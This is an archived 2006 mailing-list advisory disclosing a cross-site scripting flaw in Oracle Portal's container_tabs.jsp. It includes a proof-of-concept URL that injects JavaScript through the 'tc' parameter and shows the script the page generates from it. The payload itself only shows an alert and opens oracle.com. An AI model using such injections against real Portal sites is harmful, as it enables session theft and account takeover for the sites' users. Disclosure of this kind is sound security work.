Related information

Multiple Oracle application server vulnerabilities

Oracle Portal 10g HTTP Response Splitting

Modify Data via Inline Views

Various Cross-Site-Scripting Vulnerabilities in Oracle Reports

Cross-Site-Scripting Vulnerabilitiy in Oracle APEX NOTIFICATION_MSG

From:	putosoft softputo <hasecorp_(at)_hotmail.com>
Date:	23.12.2006
Subject:	Oracle Applications/Portal 9i/10g Cross Site Scripting

Description
---------------
There are plenty (hundreds) of Cross Site Scripting vulnerabilities in the
Oracle Portal. The following is one that you may found in any version:

http://<target>/webapp/jsp/container_tabs.
jsp?tc=null%20=%20null;alert('Hello!');window.
open('http://www.oracle.com/?fix_security_bugs_now',
%20'null');//

The following code will be generated:

---SNIPPED---
<script language=javascript>
top.null =
null;alert('Hello!');window.open('class="fixed">http://www.oracle.com/?fix_security_bugs_now',
'null');//.render(window);
</script>
---SNIPPED---

Solution
------------

There is no solution. As a workaround, enable mod_security if it's not.
Otherwise wait 6 months/1 year for a patch from Oracle Corp.

_________________________________________________________________
Dale rienda suelta a tu tiempo libre. Mil ideas para exprimir tu ocio con
MSN Entretenimiento. http://entretenimiento.msn.es/